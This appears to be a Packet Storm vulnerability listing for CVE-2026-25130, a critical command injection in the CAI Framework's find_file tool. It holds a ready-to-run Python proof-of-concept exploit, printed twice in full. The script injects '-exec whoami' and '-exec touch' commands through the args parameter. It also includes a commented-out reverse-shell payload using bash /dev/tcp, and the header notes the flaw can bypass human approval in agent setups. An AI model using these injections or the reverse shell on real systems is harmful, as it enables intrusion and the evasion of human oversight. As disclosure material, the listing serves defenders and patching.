9.6
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Description
Cybersecurity AI CAI Framework versions 0.5.10 and below suffer from a command injection vulnerability...
Basic Information
ID
PACKETSTORM:220394
Published
May 5, 2026 at 00:00
Affected Product
Affected Versions
# Exploit Title: Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection
# CVE: CVE-2026-25130
# Date: 2026-02-03
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/yourusername
# Vendor Homepage: https://github.com/aliasrobotics/cai
# Software Link: https://github.com/aliasrobotics/cai
# Vulnerable Version: cai-framework <= 0.5.10
# Tested on: cai-framework 0.5.10
# Category: Argument Injection / OS Command Injection
# Platform: Python
# Exploit Type: Unauthenticated / Authenticated depending on agent context (often bypasses human approval)
#
#
# Usage:
# Run the script directly (local execution )
# Observe command output or side effects (e.g. whoami result, created files, etc.)
from cai.tools.reconnaissance.filesystem import find_file
import sys
def main():
print("=== CVE-2026-25130 PoC - find_file Argument Injection / OS Command Injection ===")
print("Vulnerable cai-framework <= 0.5.10")
print("This demonstrates command execution via malicious 'args' parameter\n")
# ────────────────────────────────────────────────────────────────
# PoC 1: Simple proof – execute 'whoami' via -exec
# ────────────────────────────────────────────────────────────────
print("[Test 1] Executing 'whoami' via -exec")
malicious_args = "-type f -exec whoami \\;"
try:
result = find_file(
file_path="/tmp", # Any readable directory
args=malicious_args,
ctf=None
)
print("[+] Command output:\n", result)
except Exception as e:
print("[-] Execution failed:", str(e))
print("\n" + "-"*70 + "\n")
# ────────────────────────────────────────────────────────────────
# PoC 2: Touch a proof file (non-destructive marker)
# ────────────────────────────────────────────────────────────────
print("[Test 2] Creating marker file /tmp/CAI_CVE_2026_25130_PROOF")
proof_args = '-type d -exec touch /tmp/CAI_CVE_2026_25130_PROOF \\;'
try:
result = find_file(
file_path="/tmp",
args=proof_args,
ctf=None
)
print("[+] Result:\n", result)
print("Check if file exists: ls -l /tmp/CAI_CVE_2026_25130_PROOF")
except Exception as e:
print("[-] Execution failed:", str(e))
print("\n" + "-"*70 + "\n")
# ────────────────────────────────────────────────────────────────
# PoC 3: Dangerous example – reverse shell
# ────────────────────────────────────────────────────────────────
# print("[Test 3] Reverse shell example (DO NOT RUN UNLESS IN ISOLATED LAB)")
# rev_args = '-exec bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1" \\;'
# find_file("/tmp", rev_args)
print("\nPoC finished.")
print("If commands executed successfully → vulnerability confirmed.")
print("After patch (commit e22a1220) these payloads should be rejected.")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n[!] Stopped by user.")
except Exception as e:
print(f"\n[!] Unexpected error: {e}")
sys.exit(1)
# CVE: CVE-2026-25130
# Date: 2026-02-03
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/yourusername
# Vendor Homepage: https://github.com/aliasrobotics/cai
# Software Link: https://github.com/aliasrobotics/cai
# Vulnerable Version: cai-framework <= 0.5.10
# Tested on: cai-framework 0.5.10
# Category: Argument Injection / OS Command Injection
# Platform: Python
# Exploit Type: Unauthenticated / Authenticated depending on agent context (often bypasses human approval)
#
#
# Usage:
# Run the script directly (local execution )
# Observe command output or side effects (e.g. whoami result, created files, etc.)
from cai.tools.reconnaissance.filesystem import find_file
import sys
def main():
print("=== CVE-2026-25130 PoC - find_file Argument Injection / OS Command Injection ===")
print("Vulnerable cai-framework <= 0.5.10")
print("This demonstrates command execution via malicious 'args' parameter\n")
# ────────────────────────────────────────────────────────────────
# PoC 1: Simple proof – execute 'whoami' via -exec
# ────────────────────────────────────────────────────────────────
print("[Test 1] Executing 'whoami' via -exec")
malicious_args = "-type f -exec whoami \\;"
try:
result = find_file(
file_path="/tmp", # Any readable directory
args=malicious_args,
ctf=None
)
print("[+] Command output:\n", result)
except Exception as e:
print("[-] Execution failed:", str(e))
print("\n" + "-"*70 + "\n")
# ────────────────────────────────────────────────────────────────
# PoC 2: Touch a proof file (non-destructive marker)
# ────────────────────────────────────────────────────────────────
print("[Test 2] Creating marker file /tmp/CAI_CVE_2026_25130_PROOF")
proof_args = '-type d -exec touch /tmp/CAI_CVE_2026_25130_PROOF \\;'
try:
result = find_file(
file_path="/tmp",
args=proof_args,
ctf=None
)
print("[+] Result:\n", result)
print("Check if file exists: ls -l /tmp/CAI_CVE_2026_25130_PROOF")
except Exception as e:
print("[-] Execution failed:", str(e))
print("\n" + "-"*70 + "\n")
# ────────────────────────────────────────────────────────────────
# PoC 3: Dangerous example – reverse shell
# ────────────────────────────────────────────────────────────────
# print("[Test 3] Reverse shell example (DO NOT RUN UNLESS IN ISOLATED LAB)")
# rev_args = '-exec bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1" \\;'
# find_file("/tmp", rev_args)
print("\nPoC finished.")
print("If commands executed successfully → vulnerability confirmed.")
print("After patch (commit e22a1220) these payloads should be rejected.")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n[!] Stopped by user.")
except Exception as e:
print(f"\n[!] Unexpected error: {e}")
sys.exit(1)